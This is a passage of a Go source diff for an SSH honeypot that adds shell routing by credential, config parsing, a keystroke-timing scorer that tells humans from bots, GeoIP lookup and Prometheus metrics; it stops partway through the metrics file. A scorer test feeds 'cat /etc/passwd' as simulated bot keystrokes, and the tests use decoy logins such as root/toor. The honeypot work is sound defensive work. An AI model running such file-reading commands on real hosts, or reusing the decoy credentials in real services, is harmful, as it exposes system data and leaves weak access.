modernc.org/ccgo/v4 v4.30.1 h1:4r4U1J6Fhj98NKfSjnPUN7Ze2c6MnAdL0hWw6+LrJpc= modernc.org/ccgo/v4 v4.30.1 h1:4r4U1J6Fhj98NKfSjnPUN7Ze2c6MnAdL0hWw6+LrJpc=

View File

@@ -5,7 +5,7 @@ import (
"sync" "sync"
"time" "time"
"git.t-juice.club/torjus/oubliette/internal/config" "code.t-juice.club/torjus/oubliette/internal/config"
) )
const ( const (
@@ -21,6 +21,7 @@ type credKey struct {
type Decision struct { type Decision struct {
Accepted bool Accepted bool
Reason string // "static_credential", "threshold_reached", "remembered_credential", "rejected" Reason string // "static_credential", "threshold_reached", "remembered_credential", "rejected"
Shell string // optional: route to specific shell (only set for static credentials)
} }
type Authenticator struct { type Authenticator struct {
@@ -50,7 +51,7 @@ func (a *Authenticator) Authenticate(ip, username, password string) Decision {
pMatch := subtle.ConstantTimeCompare([]byte(cred.Password), []byte(password)) pMatch := subtle.ConstantTimeCompare([]byte(cred.Password), []byte(password))
if uMatch == 1 && pMatch == 1 { if uMatch == 1 && pMatch == 1 {
a.failCounts[ip] = 0 a.failCounts[ip] = 0
return Decision{Accepted: true, Reason: "static_credential"} return Decision{Accepted: true, Reason: "static_credential", Shell: cred.Shell}
} }
} }

View File

@@ -6,7 +6,7 @@ import (
"testing" "testing"
"time" "time"
"git.t-juice.club/torjus/oubliette/internal/config" "code.t-juice.club/torjus/oubliette/internal/config"
) )
func newTestAuth(acceptAfter int, ttl time.Duration, statics ...config.Credential) *Authenticator { func newTestAuth(acceptAfter int, ttl time.Duration, statics ...config.Credential) *Authenticator {
@@ -36,7 +36,7 @@ func TestStaticCredentialsWrongPassword(t *testing.T) {
func TestRejectionBeforeThreshold(t *testing.T) { func TestRejectionBeforeThreshold(t *testing.T) {
a := newTestAuth(3, time.Hour) a := newTestAuth(3, time.Hour)
for i := 0; i < 2; i++ { for i := range 2 {
d := a.Authenticate("1.2.3.4", "user", "pass") d := a.Authenticate("1.2.3.4", "user", "pass")
if d.Accepted { if d.Accepted {
t.Fatalf("attempt %d should be rejected", i+1) t.Fatalf("attempt %d should be rejected", i+1)
@@ -49,7 +49,7 @@ func TestRejectionBeforeThreshold(t *testing.T) {
func TestThresholdAcceptance(t *testing.T) { func TestThresholdAcceptance(t *testing.T) {
a := newTestAuth(3, time.Hour) a := newTestAuth(3, time.Hour)
for i := 0; i < 2; i++ { for i := range 2 {
d := a.Authenticate("1.2.3.4", "user", "pass") d := a.Authenticate("1.2.3.4", "user", "pass")
if d.Accepted { if d.Accepted {
t.Fatalf("attempt %d should be rejected", i+1) t.Fatalf("attempt %d should be rejected", i+1)
@@ -65,7 +65,7 @@ func TestPerIPIsolation(t *testing.T) {
a := newTestAuth(3, time.Hour) a := newTestAuth(3, time.Hour)
// IP1 gets 2 failures. // IP1 gets 2 failures.
for i := 0; i < 2; i++ { for range 2 {
a.Authenticate("1.1.1.1", "user", "pass") a.Authenticate("1.1.1.1", "user", "pass")
} }
@@ -153,16 +153,47 @@ func TestExpiredCredentialsSweep(t *testing.T) {
} }
} }
func TestStaticCredentialShellPropagation(t *testing.T) {
a := newTestAuth(10, time.Hour,
config.Credential{Username: "samsung", Password: "fridge", Shell: "fridge"},
config.Credential{Username: "root", Password: "toor"},
)
// Static credential with shell set should propagate it.
d := a.Authenticate("1.2.3.4", "samsung", "fridge")
if !d.Accepted || d.Reason != "static_credential" {
t.Fatalf("got %+v, want accepted with static_credential", d)
}
if d.Shell != "fridge" {
t.Errorf("Shell = %q, want %q", d.Shell, "fridge")
}
// Static credential without shell should leave it empty.
d = a.Authenticate("1.2.3.4", "root", "toor")
if !d.Accepted || d.Reason != "static_credential" {
t.Fatalf("got %+v, want accepted with static_credential", d)
}
if d.Shell != "" {
t.Errorf("Shell = %q, want empty", d.Shell)
}
// Threshold-reached decision should not have a shell set.
a2 := newTestAuth(2, time.Hour)
a2.Authenticate("5.5.5.5", "user", "pass")
d = a2.Authenticate("5.5.5.5", "user", "pass")
if d.Shell != "" {
t.Errorf("threshold decision Shell = %q, want empty", d.Shell)
}
}
func TestConcurrentAccess(t *testing.T) { func TestConcurrentAccess(t *testing.T) {
a := newTestAuth(5, time.Hour) a := newTestAuth(5, time.Hour)
var wg sync.WaitGroup var wg sync.WaitGroup
for i := 0; i < 100; i++ { for range 100 {
wg.Add(1) wg.Go(func() {
go func() {
defer wg.Done()
a.Authenticate("1.2.3.4", "user", "pass") a.Authenticate("1.2.3.4", "user", "pass")
}() })
} }
wg.Wait() wg.Wait()
} }

View File

@@ -12,10 +12,29 @@ type Config struct {
SSH SSHConfig `toml:"ssh"` SSH SSHConfig `toml:"ssh"`
Auth AuthConfig `toml:"auth"` Auth AuthConfig `toml:"auth"`
Storage StorageConfig `toml:"storage"` Storage StorageConfig `toml:"storage"`
Shell ShellConfig `toml:"shell"`
Web WebConfig `toml:"web"`
Detection DetectionConfig `toml:"detection"`
Notify NotifyConfig `toml:"notify"`
LogLevel string `toml:"log_level"` LogLevel string `toml:"log_level"`
LogFormat string `toml:"log_format"` // "text" (default) or "json" LogFormat string `toml:"log_format"` // "text" (default) or "json"
} }
type WebConfig struct {
Enabled bool `toml:"enabled"`
ListenAddr string `toml:"listen_addr"`
MetricsEnabled *bool `toml:"metrics_enabled"`
MetricsToken string `toml:"metrics_token"`
}
type ShellConfig struct {
Hostname string `toml:"hostname"`
Banner string `toml:"banner"`
FakeUser string `toml:"fake_user"`
UsernameRoutes map[string]string `toml:"username_routes"`
Shells map[string]map[string]any `toml:"-"` // per-shell config extracted manually
}
type StorageConfig struct { type StorageConfig struct {
DBPath string `toml:"db_path"` DBPath string `toml:"db_path"`
RetentionDays int `toml:"retention_days"` RetentionDays int `toml:"retention_days"`
@@ -43,6 +62,26 @@ type AuthConfig struct {
type Credential struct { type Credential struct {
Username string `toml:"username"` Username string `toml:"username"`
Password string `toml:"password"` Password string `toml:"password"`
Shell string `toml:"shell"` // optional: route to specific shell (empty = random)
}
type DetectionConfig struct {
Enabled bool `toml:"enabled"`
Threshold float64 `toml:"threshold"`
UpdateInterval string `toml:"update_interval"`
// Parsed duration, not from TOML directly.
UpdateIntervalDuration time.Duration `toml:"-"`
}
type NotifyConfig struct {
Webhooks []WebhookNotifyConfig `toml:"webhooks"`
}
type WebhookNotifyConfig struct {
URL string `toml:"url"`
Headers map[string]string `toml:"headers"`
Events []string `toml:"events"` // empty = all events
} }
func Load(path string) (*Config, error) { func Load(path string) (*Config, error) {
@@ -56,6 +95,14 @@ func Load(path string) (*Config, error) {
return nil, fmt.Errorf("parsing config: %w", err) return nil, fmt.Errorf("parsing config: %w", err)
} }
// Second pass: extract per-shell sub-tables (e.g. [shell.bash]).
var raw map[string]any
if err := toml.Unmarshal(data, &raw); err == nil {
if shellSection, ok := raw["shell"].(map[string]any); ok {
cfg.Shell.Shells = extractShellTables(shellSection)
}
}
applyDefaults(cfg) applyDefaults(cfg)
if err := validate(cfg); err != nil { if err := validate(cfg); err != nil {
@@ -96,6 +143,50 @@ func applyDefaults(cfg *Config) {
if cfg.Storage.RetentionInterval == "" { if cfg.Storage.RetentionInterval == "" {
cfg.Storage.RetentionInterval = "1h" cfg.Storage.RetentionInterval = "1h"
} }
if cfg.Web.ListenAddr == "" {
cfg.Web.ListenAddr = ":8080"
}
if cfg.Web.MetricsEnabled == nil {
t := true
cfg.Web.MetricsEnabled = &t
}
if cfg.Shell.Hostname == "" {
cfg.Shell.Hostname = "ubuntu-server"
}
if cfg.Shell.Banner == "" {
cfg.Shell.Banner = "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n"
}
if cfg.Detection.Threshold == 0 {
cfg.Detection.Threshold = 0.6
}
if cfg.Detection.UpdateInterval == "" {
cfg.Detection.UpdateInterval = "5s"
}
}
// knownShellKeys are top-level keys in [shell] that are not per-shell sub-tables.
var knownShellKeys = map[string]bool{
"hostname": true,
"banner": true,
"fake_user": true,
"username_routes": true,
}
// extractShellTables pulls per-shell config sub-tables from the raw [shell] section.
func extractShellTables(section map[string]any) map[string]map[string]any {
result := make(map[string]map[string]any)
for key, val := range section {
if knownShellKeys[key] {
continue
}
if sub, ok := val.(map[string]any); ok {
result[key] = sub
}
}
if len(result) == 0 {
return nil
}
return result
} }
func validate(cfg *Config) error { func validate(cfg *Config) error {
@@ -134,5 +225,33 @@ func validate(cfg *Config) error {
} }
} }
// Validate detection config.
if cfg.Detection.Enabled {
if cfg.Detection.Threshold < 0 || cfg.Detection.Threshold > 1 {
return fmt.Errorf("detection.threshold must be between 0 and 1, got %f", cfg.Detection.Threshold)
}
ui, err := time.ParseDuration(cfg.Detection.UpdateInterval)
if err != nil {
return fmt.Errorf("invalid detection.update_interval %q: %w", cfg.Detection.UpdateInterval, err)
}
if ui <= 0 {
return fmt.Errorf("detection.update_interval must be positive, got %s", ui)
}
cfg.Detection.UpdateIntervalDuration = ui
}
// Validate notify config.
knownEvents := map[string]bool{"human_detected": true, "session_started": true}
for i, wh := range cfg.Notify.Webhooks {
if wh.URL == "" {
return fmt.Errorf("notify.webhooks[%d]: url must not be empty", i)
}
for j, ev := range wh.Events {
if !knownEvents[ev] {
return fmt.Errorf("notify.webhooks[%d].events[%d]: unknown event %q", i, j, ev)
}
}
}
return nil return nil
} }

View File

@@ -169,6 +169,135 @@ retention_interval = "2h"
} }
} }
func TestLoadShellDefaults(t *testing.T) {
path := writeTemp(t, "")
cfg, err := Load(path)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if cfg.Shell.Hostname != "ubuntu-server" {
t.Errorf("default hostname = %q, want %q", cfg.Shell.Hostname, "ubuntu-server")
}
if cfg.Shell.Banner == "" {
t.Error("default banner should not be empty")
}
if cfg.Shell.FakeUser != "" {
t.Errorf("default fake_user = %q, want empty", cfg.Shell.FakeUser)
}
}
func TestLoadShellConfig(t *testing.T) {
content := `
[shell]
hostname = "myhost"
banner = "Custom banner\r\n"
fake_user = "admin"
[shell.bash]
custom_key = "value"
`
path := writeTemp(t, content)
cfg, err := Load(path)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if cfg.Shell.Hostname != "myhost" {
t.Errorf("hostname = %q, want %q", cfg.Shell.Hostname, "myhost")
}
if cfg.Shell.Banner != "Custom banner\r\n" {
t.Errorf("banner = %q, want %q", cfg.Shell.Banner, "Custom banner\r\n")
}
if cfg.Shell.FakeUser != "admin" {
t.Errorf("fake_user = %q, want %q", cfg.Shell.FakeUser, "admin")
}
if cfg.Shell.Shells == nil {
t.Fatal("Shells map should not be nil")
}
bashCfg, ok := cfg.Shell.Shells["bash"]
if !ok {
t.Fatal("Shells[\"bash\"] not found")
}
if bashCfg["custom_key"] != "value" {
t.Errorf("Shells[\"bash\"][\"custom_key\"] = %v, want %q", bashCfg["custom_key"], "value")
}
}
func TestLoadWebDefaults(t *testing.T) {
path := writeTemp(t, "")
cfg, err := Load(path)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if cfg.Web.Enabled {
t.Error("web should be disabled by default")
}
if cfg.Web.ListenAddr != ":8080" {
t.Errorf("default web listen_addr = %q, want %q", cfg.Web.ListenAddr, ":8080")
}
}
func TestLoadWebConfig(t *testing.T) {
content := `
[web]
enabled = true
listen_addr = ":9090"
`
path := writeTemp(t, content)
cfg, err := Load(path)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if !cfg.Web.Enabled {
t.Error("web should be enabled")
}
if cfg.Web.ListenAddr != ":9090" {
t.Errorf("web listen_addr = %q, want %q", cfg.Web.ListenAddr, ":9090")
}
}
func TestLoadCredentialWithShell(t *testing.T) {
content := `
[[auth.static_credentials]]
username = "samsung"
password = "fridge"
shell = "fridge"
[[auth.static_credentials]]
username = "root"
password = "toor"
`
path := writeTemp(t, content)
cfg, err := Load(path)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if len(cfg.Auth.StaticCredentials) != 2 {
t.Fatalf("static_credentials len = %d, want 2", len(cfg.Auth.StaticCredentials))
}
if cfg.Auth.StaticCredentials[0].Shell != "fridge" {
t.Errorf("cred[0].Shell = %q, want %q", cfg.Auth.StaticCredentials[0].Shell, "fridge")
}
if cfg.Auth.StaticCredentials[1].Shell != "" {
t.Errorf("cred[1].Shell = %q, want empty", cfg.Auth.StaticCredentials[1].Shell)
}
}
func TestLoadMetricsToken(t *testing.T) {
content := `
[web]
enabled = true
metrics_token = "my-secret-token"
`
path := writeTemp(t, content)
cfg, err := Load(path)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if cfg.Web.MetricsToken != "my-secret-token" {
t.Errorf("metrics_token = %q, want %q", cfg.Web.MetricsToken, "my-secret-token")
}
}
func TestLoadMissingFile(t *testing.T) { func TestLoadMissingFile(t *testing.T) {
_, err := Load("/nonexistent/path/config.toml") _, err := Load("/nonexistent/path/config.toml")
if err == nil { if err == nil {
@@ -184,6 +313,42 @@ func TestLoadInvalidTOML(t *testing.T) {
} }
} }
func TestLoadUsernameRoutes(t *testing.T) {
content := `
[shell]
hostname = "myhost"
[shell.username_routes]
postgres = "psql"
admin = "bash"
[shell.bash]
custom_key = "value"
`
path := writeTemp(t, content)
cfg, err := Load(path)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if cfg.Shell.UsernameRoutes == nil {
t.Fatal("UsernameRoutes should not be nil")
}
if cfg.Shell.UsernameRoutes["postgres"] != "psql" {
t.Errorf("UsernameRoutes[\"postgres\"] = %q, want %q", cfg.Shell.UsernameRoutes["postgres"], "psql")
}
if cfg.Shell.UsernameRoutes["admin"] != "bash" {
t.Errorf("UsernameRoutes[\"admin\"] = %q, want %q", cfg.Shell.UsernameRoutes["admin"], "bash")
}
// username_routes should NOT appear in the Shells map.
if _, ok := cfg.Shell.Shells["username_routes"]; ok {
t.Error("username_routes should not appear in Shells map")
}
// bash should still appear in Shells map.
if _, ok := cfg.Shell.Shells["bash"]; !ok {
t.Error("Shells[\"bash\"] should still be present")
}
}
func writeTemp(t *testing.T, content string) string { func writeTemp(t *testing.T, content string) string {
t.Helper() t.Helper()
path := filepath.Join(t.TempDir(), "config.toml") path := filepath.Join(t.TempDir(), "config.toml")

View File

@@ -0,0 +1,259 @@
package detection
import (
"math"
"sync"
"time"
)
// Direction constants for RecordEvent.
const (
DirInput = 0 // client → server (keystrokes)
DirOutput = 1 // server → client (shell output)
)
// Signal weights for the composite score.
const (
weightTimingVariance = 0.30
weightSpecialKeys = 0.20
weightTypingSpeed = 0.20
weightCommandDiversity = 0.15
weightSessionDuration = 0.15
)
// Scorer accumulates keystroke events and computes a 0.01.0
// human likelihood score based on multiple signals.
type Scorer struct {
mu sync.Mutex
// Input timing data.
inputTimes []time.Time
delays []time.Duration
// Special key counters.
specialKeys int
// Command tracking: we count newlines and unique command prefixes.
currentCmd []byte
commands map[string]struct{}
// Session activity duration.
firstInput time.Time
lastInput time.Time
}
// NewScorer returns a new Scorer ready to record events.
func NewScorer() *Scorer {
return &Scorer{
commands: make(map[string]struct{}),
}
}
// RecordEvent records a data event with timestamp and direction.
// direction should be DirInput (0) for client input or DirOutput (1) for server output.
func (s *Scorer) RecordEvent(ts time.Time, direction int, data []byte) {
if direction != DirInput {
return // only analyze input
}
s.mu.Lock()
defer s.mu.Unlock()
if s.firstInput.IsZero() {
s.firstInput = ts
}
s.lastInput = ts
for _, b := range data {
// Track inter-keystroke delay for single-byte inputs.
if len(s.inputTimes) > 0 {
delay := ts.Sub(s.inputTimes[len(s.inputTimes)-1])
if delay > 0 && delay < 30*time.Second {
s.delays = append(s.delays, delay)
}
}
s.inputTimes = append(s.inputTimes, ts)
// Count special keys.
if isSpecialKey(b) {
s.specialKeys++
}
// Track commands (split on newline/CR).
if b == '\r' || b == '\n' {
cmd := string(s.currentCmd)
if len(cmd) > 0 {
s.commands[cmd] = struct{}{}
}
s.currentCmd = s.currentCmd[:0]
} else {
// Handle backspace: remove last byte from current command.
if b == 0x7f || b == 0x08 {
if len(s.currentCmd) > 0 {
s.currentCmd = s.currentCmd[:len(s.currentCmd)-1]
}
} else if b >= 0x20 { // printable
s.currentCmd = append(s.currentCmd, b)
}
}
}
}
// Score computes the composite human likelihood score (0.01.0).
// Thread-safe.
func (s *Scorer) Score() float64 {
s.mu.Lock()
defer s.mu.Unlock()
if len(s.inputTimes) == 0 {
return 0
}
tv := s.timingVarianceScore()
sk := s.specialKeysScore()
ts := s.typingSpeedScore()
cd := s.commandDiversityScore()
sd := s.sessionDurationScore()
score := tv*weightTimingVariance +
sk*weightSpecialKeys +
ts*weightTypingSpeed +
cd*weightCommandDiversity +
sd*weightSessionDuration
return clamp(score, 0, 1)
}
// timingVarianceScore returns 01 based on coefficient of variation of inter-key delays.
// Bots have CV ≈ 0 (instant or uniform), humans have CV ≥ 0.6.
func (s *Scorer) timingVarianceScore() float64 {
if len(s.delays) < 3 {
return 0
}
mean := meanDuration(s.delays)
if mean == 0 {
return 0
}
variance := 0.0
for _, d := range s.delays {
diff := float64(d) - float64(mean)
variance += diff * diff
}
variance /= float64(len(s.delays))
stddev := math.Sqrt(variance)
cv := stddev / float64(mean)
// Map CV to 01: CV of 0.6+ is fully human-like.
return clamp(cv/0.6, 0, 1)
}
// specialKeysScore returns 01 based on count of special key presses.
// Scripts almost never generate backspace/tab/ctrl characters.
func (s *Scorer) specialKeysScore() float64 {
// 5+ special keys → full score.
return clamp(float64(s.specialKeys)/5.0, 0, 1)
}
// typingSpeedScore returns 01 based on median inter-key delay.
// Paste/scripts have < 5ms, humans have 30300ms.
func (s *Scorer) typingSpeedScore() float64 {
if len(s.delays) < 2 {
return 0
}
med := medianDuration(s.delays)
ms := float64(med) / float64(time.Millisecond)
if ms < 5 {
return 0 // paste or script
}
if ms > 300 {
return 0.7 // very slow, still possibly human
}
if ms >= 30 && ms <= 300 {
return 1.0 // human range
}
// 530ms: transition zone
return clamp((ms-5)/25, 0, 1)
}
// commandDiversityScore returns 01 based on number of unique commands.
func (s *Scorer) commandDiversityScore() float64 {
// 3+ unique commands → full score.
return clamp(float64(len(s.commands))/3.0, 0, 1)
}
// sessionDurationScore returns 01 based on active input duration.
func (s *Scorer) sessionDurationScore() float64 {
if s.firstInput.IsZero() || s.lastInput.IsZero() {
return 0
}
dur := s.lastInput.Sub(s.firstInput)
// 10s+ of active input → full score.
return clamp(float64(dur)/float64(10*time.Second), 0, 1)
}
// isSpecialKey returns true for non-printable keys that humans commonly use.
func isSpecialKey(b byte) bool {
switch b {
case 0x7f, // DEL (backspace in most terminals)
0x08, // BS
0x09, // TAB
0x03, // Ctrl-C
0x04, // Ctrl-D
0x1b: // ESC (arrow keys start with ESC)
return true
}
return false
}
func clamp(v, lo, hi float64) float64 {
if v < lo {
return lo
}
if v > hi {
return hi
}
return v
}
func meanDuration(ds []time.Duration) time.Duration {
if len(ds) == 0 {
return 0
}
var sum time.Duration
for _, d := range ds {
sum += d
}
return sum / time.Duration(len(ds))
}
func medianDuration(ds []time.Duration) time.Duration {
n := len(ds)
if n == 0 {
return 0
}
// Copy to avoid mutating the original.
sorted := make([]time.Duration, n)
copy(sorted, ds)
sortDurations(sorted)
if n%2 == 0 {
return (sorted[n/2-1] + sorted[n/2]) / 2
}
return sorted[n/2]
}
func sortDurations(ds []time.Duration) {
// Simple insertion sort — delay slices are small.
for i := 1; i < len(ds); i++ {
key := ds[i]
j := i - 1
for j >= 0 && ds[j] > key {
ds[j+1] = ds[j]
j--
}
ds[j+1] = key
}
}

View File

@@ -0,0 +1,151 @@
package detection
import (
"sync"
"testing"
"time"
)
func TestScorer_EmptyInput(t *testing.T) {
s := NewScorer()
score := s.Score()
if score != 0 {
t.Errorf("empty scorer: got %f, want 0", score)
}
}
func TestScorer_SingleKeystroke(t *testing.T) {
s := NewScorer()
s.RecordEvent(time.Now(), DirInput, []byte("a"))
score := s.Score()
if score != 0 {
t.Errorf("single keystroke: got %f, want 0", score)
}
}
func TestScorer_BotLikeInput(t *testing.T) {
// Simulate a bot: paste entire commands with uniform tiny delays, no special keys.
s := NewScorer()
now := time.Now()
// Bot pastes "cat /etc/passwd\r" all at once with perfectly uniform timing.
for range 3 {
cmd := []byte("cat /etc/passwd\r")
for _, b := range cmd {
s.RecordEvent(now, DirInput, []byte{b})
now = now.Add(100 * time.Microsecond) // ~0.1ms uniform delay = paste
}
}
score := s.Score()
if score >= 0.3 {
t.Errorf("bot-like input: got %f, want < 0.3", score)
}
}
func TestScorer_HumanLikeInput(t *testing.T) {
// Simulate a human: variable timing, backspaces, diverse commands.
s := NewScorer()
now := time.Now()
type cmd struct {
text string
delay time.Duration // base delay between keys
}
commands := []cmd{
{"ls -la\r", 80 * time.Millisecond},
{"cat /etc/paswd", 120 * time.Millisecond}, // typo
{string([]byte{0x7f}), 200 * time.Millisecond}, // backspace
{"wd\r", 90 * time.Millisecond}, // correction
{"whoami\r", 100 * time.Millisecond},
{"uname -a\r", 150 * time.Millisecond},
{string([]byte{0x09}), 300 * time.Millisecond}, // tab completion
{"pwd\r", 70 * time.Millisecond},
}
for _, c := range commands {
for _, b := range []byte(c.text) {
// Add ±30% jitter to make timing more natural.
jitter := time.Duration(float64(c.delay) * 0.3)
delay := c.delay + jitter // simplified: always add, still variable across commands
s.RecordEvent(now, DirInput, []byte{b})
now = now.Add(delay)
}
// Pause between commands (thinking time).
now = now.Add(2 * time.Second)
}
score := s.Score()
if score <= 0.6 {
t.Errorf("human-like input: got %f, want > 0.6", score)
}
}
func TestScorer_OutputIgnored(t *testing.T) {
s := NewScorer()
now := time.Now()
// Only output events — should not affect score.
for range 100 {
s.RecordEvent(now, DirOutput, []byte("some output\n"))
now = now.Add(10 * time.Millisecond)
}
score := s.Score()
if score != 0 {
t.Errorf("output-only: got %f, want 0", score)
}
}
func TestScorer_ThreadSafety(t *testing.T) {
s := NewScorer()
now := time.Now()
var wg sync.WaitGroup
for i := range 10 {
wg.Go(func() {
for j := range 100 {
ts := now.Add(time.Duration(i*100+j) * time.Millisecond)
s.RecordEvent(ts, DirInput, []byte("a"))
}
})
}
// Concurrently read score.
wg.Go(func() {
for range 50 {
_ = s.Score()
}
})
wg.Wait()
// Should not panic; score should be valid.
score := s.Score()
if score < 0 || score > 1 {
t.Errorf("concurrent score out of range: %f", score)
}
}
func TestScorer_CommandDiversity(t *testing.T) {
s := NewScorer()
now := time.Now()
// Type 4 different commands with human-ish timing.
cmds := []string{"ls\r", "pwd\r", "id\r", "whoami\r"}
for _, cmd := range cmds {
for _, b := range []byte(cmd) {
s.RecordEvent(now, DirInput, []byte{b})
now = now.Add(100 * time.Millisecond)
}
now = now.Add(time.Second)
}
score := s.Score()
// With 4 unique commands, human timing, and decent duration,
// we should get a meaningful score.
if score < 0.4 {
t.Errorf("diverse commands: got %f, want >= 0.4", score)
}
}

51
internal/geoip/geoip.go Normal file
View File

@@ -0,0 +1,51 @@
package geoip
import (
_ "embed"
"net"
"github.com/oschwald/maxminddb-golang"
)
//go:embed dbip-country-lite.mmdb
var mmdbData []byte
// Reader provides country-level GeoIP lookups using an embedded DB-IP Lite database.
type Reader struct {
db *maxminddb.Reader
}
// New opens the embedded MMDB and returns a ready-to-use Reader.
func New() (*Reader, error) {
db, err := maxminddb.FromBytes(mmdbData)
if err != nil {
return nil, err
}
return &Reader{db: db}, nil
}
type countryRecord struct {
Country struct {
ISOCode string `maxminddb:"iso_code"`
} `maxminddb:"country"`
}
// Lookup returns the ISO 3166-1 alpha-2 country code for the given IP address,
// or an empty string if the lookup fails or no result is found.
func (r *Reader) Lookup(ipStr string) string {
ip := net.ParseIP(ipStr)
if ip == nil {
return ""
}
var record countryRecord
if err := r.db.Lookup(ip, &record); err != nil {
return ""
}
return record.Country.ISOCode
}
// Close releases resources held by the reader.
func (r *Reader) Close() error {
return r.db.Close()
}

View File

@@ -0,0 +1,44 @@
package geoip
import "testing"
func TestLookup(t *testing.T) {
reader, err := New()
if err != nil {
t.Fatalf("New: %v", err)
}
defer reader.Close()
tests := []struct {
ip string
want string
}{
{"8.8.8.8", "US"},
{"1.1.1.1", "AU"},
{"invalid", ""},
{"", ""},
}
for _, tt := range tests {
t.Run(tt.ip, func(t *testing.T) {
got := reader.Lookup(tt.ip)
if got != tt.want {
t.Errorf("Lookup(%q) = %q, want %q", tt.ip, got, tt.want)
}
})
}
}
func TestLookupPrivateIP(t *testing.T) {
reader, err := New()
if err != nil {
t.Fatalf("New: %v", err)
}
defer reader.Close()
// Private IPs should return empty string (no country).
got := reader.Lookup("10.0.0.1")
if got != "" {
t.Errorf("Lookup(10.0.0.1) = %q, want empty", got)
}
}

178
internal/metrics/metrics.go Normal file
View File

@@ -0,0 +1,178 @@
package metrics
import (
"context"
"net/http"
"code.t-juice.club/torjus/oubliette/internal/storage"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/collectors"
"github.com/prometheus/client_golang/prometheus/promhttp"
)
// Metrics holds all Prometheus collectors for the honeypot.
type Metrics struct {
registry *prometheus.Registry
SSHConnectionsTotal *prometheus.CounterVec
SSHConnectionsActive prometheus.Gauge
AuthAttemptsTotal *prometheus.CounterVec
AuthAttemptsByCountry *prometheus.CounterVec
CommandsExecuted *prometheus.CounterVec
HumanScore prometheus.Histogram
SessionsTotal *prometheus.CounterVec
SessionsActive prometheus.Gauge
SessionDuration prometheus.Histogram
ExecCommandsTotal prometheus.Counter
BuildInfo *prometheus.GaugeVec
StorageQueryDuration *prometheus.HistogramVec
StorageQueryErrors *prometheus.CounterVec
}
// New creates a new Metrics instance with all collectors registered.
func New(version string) *Metrics {
reg := prometheus.NewRegistry()
m := &Metrics{
registry: reg,
SSHConnectionsTotal: prometheus.NewCounterVec(prometheus.CounterOpts{
Name: "oubliette_ssh_connections_total",
Help: "Total SSH connections received.",
}, []string{"outcome"}),
SSHConnectionsActive: prometheus.NewGauge(prometheus.GaugeOpts{
Name: "oubliette_ssh_connections_active",
Help: "Current active SSH connections.",
}),
AuthAttemptsTotal: prometheus.NewCounterVec(prometheus.CounterOpts{
Name: "oubliette_auth_attempts_total",
Help: "Total authentication attempts.",
}, []string{"result", "reason"}),
AuthAttemptsByCountry: prometheus.NewCounterVec(prometheus.CounterOpts{
Name: "oubliette_auth_attempts_by_country_total",
Help: "Total authentication attempts by country.",
}, []string{"country"}),
CommandsExecuted: prometheus.NewCounterVec(prometheus.CounterOpts{
Name: "oubliette_commands_executed_total",
Help: "Total commands executed in shells.",
}, []string{"shell"}),
HumanScore: prometheus.NewHistogram(prometheus.HistogramOpts{
Name: "oubliette_human_score",
Help: "Distribution of final human detection scores.",
Buckets: prometheus.LinearBuckets(0, 0.1, 11), // 0.0, 0.1, ..., 1.0
}),
SessionsTotal: prometheus.NewCounterVec(prometheus.CounterOpts{
Name: "oubliette_sessions_total",
Help: "Total sessions created.",
}, []string{"shell"}),
SessionsActive: prometheus.NewGauge(prometheus.GaugeOpts{
Name: "oubliette_sessions_active",
Help: "Current active sessions.",
}),
SessionDuration: prometheus.NewHistogram(prometheus.HistogramOpts{
Name: "oubliette_session_duration_seconds",
Help: "Session duration in seconds.",
Buckets: []float64{1, 5, 10, 30, 60, 120, 300, 600, 1800, 3600},
}),
ExecCommandsTotal: prometheus.NewCounter(prometheus.CounterOpts{
Name: "oubliette_exec_commands_total",
Help: "Total SSH exec commands received.",
}),
BuildInfo: prometheus.NewGaugeVec(prometheus.GaugeOpts{
Name: "oubliette_build_info",
Help: "Build information. Always 1.",
}, []string{"version"}),
StorageQueryDuration: prometheus.NewHistogramVec(prometheus.HistogramOpts{
Name: "oubliette_storage_query_duration_seconds",
Help: "Duration of storage query calls in seconds.",
Buckets: []float64{0.001, 0.005, 0.01, 0.05, 0.1, 0.25, 0.5, 1, 2.5, 5, 10},
}, []string{"method"}),
StorageQueryErrors: prometheus.NewCounterVec(prometheus.CounterOpts{
Name: "oubliette_storage_query_errors_total",
Help: "Total storage query errors.",
}, []string{"method"}),
}
reg.MustRegister(
collectors.NewGoCollector(),
collectors.NewProcessCollector(collectors.ProcessCollectorOpts{}),
m.SSHConnectionsTotal,
m.SSHConnectionsActive,
m.AuthAttemptsTotal,
m.AuthAttemptsByCountry,
m.CommandsExecuted,
m.HumanScore,
m.SessionsTotal,
m.SessionsActive,
m.SessionDuration,
m.ExecCommandsTotal,
m.BuildInfo,
m.StorageQueryDuration,
m.StorageQueryErrors,
)
m.BuildInfo.WithLabelValues(version).Set(1)
// Initialize label combinations so they appear in Gather/output.
for _, outcome := range []string{"accepted", "rejected_handshake", "rejected_max_connections"} {
m.SSHConnectionsTotal.WithLabelValues(outcome)
}
for _, reason := range []string{"static_credential", "remembered_credential", "threshold_reached", "rejected"} {
m.AuthAttemptsTotal.WithLabelValues("accepted", reason)
m.AuthAttemptsTotal.WithLabelValues("rejected", reason)
}
for _, sh := range []string{"bash", "fridge", "banking", "adventure", "cisco"} {
m.SessionsTotal.WithLabelValues(sh)
m.CommandsExecuted.WithLabelValues(sh)
}
return m
}
// RegisterStoreCollector registers a collector that queries storage stats on each scrape.
func (m *Metrics) RegisterStoreCollector(store storage.Store) {
m.registry.MustRegister(&storeCollector{store: store})
}
// Handler returns an http.Handler that serves Prometheus metrics.
func (m *Metrics) Handler() http.Handler {
return promhttp.HandlerFor(m.registry, promhttp.HandlerOpts{})
}
// storeCollector implements prometheus.Collector, querying storage on each scrape.
type storeCollector struct {
store storage.Store
}
var (
storageLoginAttemptsDesc = prometheus.NewDesc(
"oubliette_storage_login_attempts_total",
"Total login attempts in storage.",
nil, nil,
)
storageUniqueIPsDesc = prometheus.NewDesc(
"oubliette_storage_unique_ips",
"Unique IPs in storage.",
nil, nil,
)
storageSessionsDesc = prometheus.NewDesc(
"oubliette_storage_sessions_total",
